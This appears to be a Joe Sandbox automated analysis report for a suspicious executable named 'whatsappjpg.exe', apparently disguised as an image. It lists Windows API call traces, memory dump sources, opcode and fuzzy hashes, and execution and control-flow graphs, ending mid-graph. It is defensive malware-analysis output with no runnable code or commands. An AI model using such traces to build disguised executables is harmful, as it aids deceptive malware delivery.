                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                      • String ID:
                                                      • API String ID: 3808545654-0
                                                      • Opcode ID: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                      • Instruction ID: 44c615356a1505882b51123a4f434c8e94683597a24d5f064f7d9f3cb87cb74c
                                                      • Opcode Fuzzy Hash: de03f2b16b471deeb75989a648f0339490e64a22e039540fc3332c447546e770
                                                      • Instruction Fuzzy Hash: 25012630948280AFE7006BB0AE4BB9A7F74EF95305F104479F145B62E2C37810009B6E
                                                      APIs
                                                      • lstrlenW.KERNEL32(004226D0,004226D0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A07
                                                      • wsprintfW.USER32 ref: 00404A10
                                                      • SetDlgItemTextW.USER32(?,004226D0), ref: 00404A23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ItemTextlstrlenwsprintf
                                                      • String ID: %u.%u%s%s
                                                      • API String ID: 3540041739-3551169577
                                                      • Opcode ID: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                      • Instruction ID: 11a56ec29d8e774b63c5a31ca8dd146b3e369a93441477fc7d09fda37b012288
                                                      • Opcode Fuzzy Hash: 5ac319f3f1fbe76218499090b5c3f3a2c47b89264d6babd6022050aef882dcc8
                                                      • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                      • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                      • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                      • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00405939
                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403342,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403510), ref: 00405943
                                                      • lstrcatW.KERNEL32(?,00409014), ref: 00405955
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405933
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrcatlstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 2659869361-297319885
                                                      • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction ID: 44c8f02d27920c7d59b6ae10536407caccd7e36c496fb0f87730dad2d93a7b21
                                                      • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                      • Instruction Fuzzy Hash: FFD05261101920AAC222AB488C04D9B67ACEE86301340002AF201B20A2CB7C2E428BFE
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                      • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                      • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                      • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405135
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                        • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                      • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                      • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                      • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                      APIs
                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,10001259,?,?,10001534,?,10001020,10001019,?), ref: 10001225
                                                      • lstrcpyW.KERNEL32(00000000,10004020,00000000,10001749,00000000), ref: 100015E5
                                                      • wsprintfW.USER32 ref: 1000160A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: AllocGloballstrcpywsprintf
                                                      • String ID: s<u
                                                      • API String ID: 2689062267-779365171
                                                      • Opcode ID: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                      • Instruction ID: 1bcf6e6733af89869fae1c20b53ab816a204ac51a82716e0e01f59040c2558f4
                                                      • Opcode Fuzzy Hash: b666731ea850b0db34310f966fc1483e79c072b1553816228d181fcf3b6ead58
                                                      • Instruction Fuzzy Hash: F8E0D830600821E7F121D7649C44ACD37A8FF412E67164115F706E618DCB228A424689
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76F92EE0,004037F4,76F93420,0040361F,?), ref: 00403837
                                                      • GlobalFree.KERNEL32(?), ref: 0040383E
                                                      Strings
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040382F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Free$GlobalLibrary
                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                      • API String ID: 1100898210-297319885
                                                      • Opcode ID: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                      • Instruction ID: 46cd0999c48b818ae3c50a5e697a2c548effd71f48cd6e5996984714d7197a8e
                                                      • Opcode Fuzzy Hash: 25d95e5d869358f2c737a5aedab69329feae714e5110f3e95756ca8a51977f9e
                                                      • Instruction Fuzzy Hash: 01E0C23390503057C7316F14ED05B1ABBE86F89B22F014076F9417B7A183746C528BED
                                                      APIs
                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405985
                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E26,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\whatsappjpg.exe,C:\Users\user\Desktop\whatsappjpg.exe,80000000,00000003), ref: 00405995
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharPrevlstrlen
                                                      • String ID: C:\Users\user\Desktop
                                                      • API String ID: 2709904686-2743851969
                                                      • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction ID: 052b7d625f743090f45407db0d4342bedadcdb208645d65a5e8033f28458e035
                                                      • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                      • Instruction Fuzzy Hash: 4DD05EB2400A20DAD3226B08DC009AFB3ACEF113107464466F841A21A5D7786D818BE9
                                                      APIs
                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloclstrcpy
                                                      • String ID:
                                                      • API String ID: 852173138-0
                                                      • Opcode ID: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                      • Instruction ID: c8ae98bcc35e74d2b72c58860f7bdf59a74f39180ec1ffd54fa0f92d9f30571b
                                                      • Opcode Fuzzy Hash: 45a5d3319c716c3518dc5b77d0b954dd710989e410c13165b505e15e89ce8376
                                                      • Instruction Fuzzy Hash: 5E3190F6904211AFF314CF64DC859EA77E8EB853D0B124529FB41E726CEB34E8018765
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                      • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                      • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                      • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9

                                                      Execution Graph

                                                      Execution Coverage:10.6%
                                                      Dynamic/Decrypted Code Coverage:89.7%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:39
                                                      Total number of Limit Nodes:2
                                                      execution_graph 37611 394a2d38 37612 394a2d7e GetCurrentProcess 37611->37612 37614 394a2dd0 GetCurrentThread 37612->37614 37617 394a2dc9 37612->37617 37615 394a2e0d GetCurrentProcess 37614->37615 37616 394a2e06 37614->37616 37618 394a2e43 37615->37618 37616->37615 37617->37614 37619 394a2e6b GetCurrentThreadId 37618->37619 37620 394a2e9c 37619->37620 37621 ad01c 37622 ad034 37621->37622 37623 ad08e 37622->37623 37627 394aa2e4 CallWindowProcW 37622->37627 37628 394ad3f8 37622->37628 37632 394ae559 37622->37632 37636 394ad408 37622->37636 37627->37623 37629 394ad42e 37628->37629 37630 394aa2e4 CallWindowProcW 37629->37630 37631 394ad44f 37630->37631 37631->37623 37634 394ae595 37632->37634 37635 394ae5b9 37634->37635 37640 394aa3ac CallWindowProcW 37634->37640 37637 394ad42e 37636->37637 37638 394aa2e4 CallWindowProcW 37637->37638 37639 394ad44f 37638->37639 37639->37623 37640->37635 37598 394af960 37599 394afa7c 37598->37599 37600 394af9d2 37598->37600 37604 394aa2e4 37599->37604 37601 394afa2a CallWindowProcW 37600->37601 37603 394af9d9 37600->37603 37601->37603 37605 394aa2ef 37604->37605 37607 394ae5b9 37605->37607 37608 394aa3ac CallWindowProcW 37605->37608 37608->37607 37609 394a2f80 DuplicateHandle 37610 394a3016 37609->37610 37641 394ad250 37642 394ad2b8 CreateWindowExW 37641->37642 37644 394ad374 37642->37644
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f68d6a68d584140a832fd97940d35243e8a7262c8b958f94c9052a408748aa0
                                                      • Instruction ID: 1c443091e4a844577a7acec3cf7788ea8569bfa4caab649c3ec5ae9088a50956
                                                      • Opcode Fuzzy Hash: 6f68d6a68d584140a832fd97940d35243e8a7262c8b958f94c9052a408748aa0
                                                      • Instruction Fuzzy Hash: 95631A35D10B5A8ADB11EF68C894599F7B1FF99300F15C79AE4487B221FB70AAC4CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 38e3ea5032a6d25bff684276e49b9065853b250c20c95d32650bdc4e5567abfa
                                                      • Instruction ID: 5a15027380ca257cbdf95a3b9d6bc027ff72b5f572a3766b3de3f5453654c00e
                                                      • Opcode Fuzzy Hash: 38e3ea5032a6d25bff684276e49b9065853b250c20c95d32650bdc4e5567abfa
                                                      • Instruction Fuzzy Hash: B043F631C10B5A8ADB51EF68C894599F7B1FF99300F11D79AE4487B221FB70AAD4CB81
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3845952269.00000000394D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 394D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_394d0000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 576e48c164b4ce713b2fc99cd2abc03042dc967df86e6ebafd78ea5a0a40d225
                                                      • Instruction ID: 2f681e49d9a110edea2c3bcfffd1d41fde975398e4d81130d394f057c1d6a8a0
                                                      • Opcode Fuzzy Hash: 576e48c164b4ce713b2fc99cd2abc03042dc967df86e6ebafd78ea5a0a40d225
                                                      • Instruction Fuzzy Hash: 03332B35D10B598EDB11EF68C89469DF7B1FF89300F14C79AE449A7221EB70AAC5CB81

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1547 394d8730-394d874d 1548 394d874f-394d8752 1547->1548 1549 394d8754-394d8771 1548->1549 1550 394d8776-394d8779 1548->1550 1549->1550 1551 394d877b-394d878c 1550->1551 1552 394d8791-394d8794 1550->1552 1551->1552 1553 394d879b-394d879e 1552->1553 1554 394d8796-394d8798 1552->1554 1557 394d87d9-394d87dc 1553->1557 1558 394d87a0-394d87a6 1553->1558 1554->1553 1562 394d87de-394d87e3 1557->1562 1563 394d87e6-394d87e9 1557->1563 1560 394d87ac-394d87b7 1558->1560 1561 394d890f-394d893b 1558->1561 1560->1561 1566 394d87bd-394d87ca 1560->1566 1577 394d8945-394d8948 1561->1577 1562->1563 1564 394d8808-394d880b 1563->1564 1565 394d87eb-394d8803 1563->1565 1567 394d880d-394d8813 1564->1567 1568 394d881a-394d881d 1564->1568 1565->1564 1566->1561 1570 394d87d0-394d87d4 1566->1570 1567->1558 1572 394d8815 1567->1572 1573 394d881f-394d8820 1568->1573 1574 394d8825-394d8828 1568->1574 1570->1557 1572->1568 1573->1574 1575 394d882a-394d882b 1574->1575 1576 394d8830-394d8833 1574->1576 1575->1576 1578 394d8835-394d883b 1576->1578 1579 394d8842-394d8845 1576->1579 1580 394d896a-394d896d 1577->1580 1581 394d894a-394d894e 1577->1581 1578->1575 1584 394d883d 1578->1584 1585 394d8847-394d8850 1579->1585 1586 394d8851-394d8854 1579->1586 1582 394d896f-394d8976 1580->1582 1583 394d8981-394d8984 1580->1583 1587 394d8954-394d895c 1581->1587 1588 394d8a36-394d8a74 1581->1588 1592 394d897c 1582->1592 1593 394d8a2e-394d8a35 1582->1593 1594 394d89a6-394d89a9 1583->1594 1595 394d8986-394d898a 1583->1595 1584->1579 1589 394d8856-394d886c 1586->1589 1590 394d8871-394d8874 1586->1590 1587->1588 1591 394d8962-394d8965 1587->1591 1602 394d8a76-394d8a79 1588->1602 1589->1590 1597 394d8885-394d8888 1590->1597 1598 394d8876-394d887a 1590->1598 1591->1580 1592->1583 1600 394d89ab-394d89b2 1594->1600 1601 394d89b3-394d89b6 1594->1601 1595->1588 1599 394d8990-394d8998 1595->1599 1606 394d8898-394d889b 1597->1606 1607 394d888a-394d888d 1597->1607 1604 394d8901-394d890e 1598->1604 1605 394d8880 1598->1605 1599->1588 1608 394d899e-394d89a1 1599->1608 1609 394d89b8-394d89c2 1601->1609 1610 394d89c7-394d89ca 1601->1610 1611 394d8a7b-394d8a8c 1602->1611 1612 394d8a93-394d8a96 1602->1612 1605->1597 1614 394d889d-394d88ad 1606->1614 1615 394d88b2-394d88b5 1606->1615 1607->1565 1613 394d8893 1607->1613 1608->1594 1609->1610 1616 394d89cc-394d89d0 1610->1616 1617 394d89e4-394d89e7 1610->1617 1631 394d8aa5-394d8ab8 1611->1631 1637 394d8a8e 1611->1637 1621 394d8a98-394d8a9d 1612->1621 1622 394d8aa0-394d8aa3 1612->1622 1613->1606 1614->1615 1615->1567 1624 394d88bb-394d88be 1615->1624 1616->1588 1618 394d89d2-394d89da 1616->1618 1619 394d89e9-394d89ed 1617->1619 1620 394d8a01-394d8a04 1617->1620 1618->1588 1625 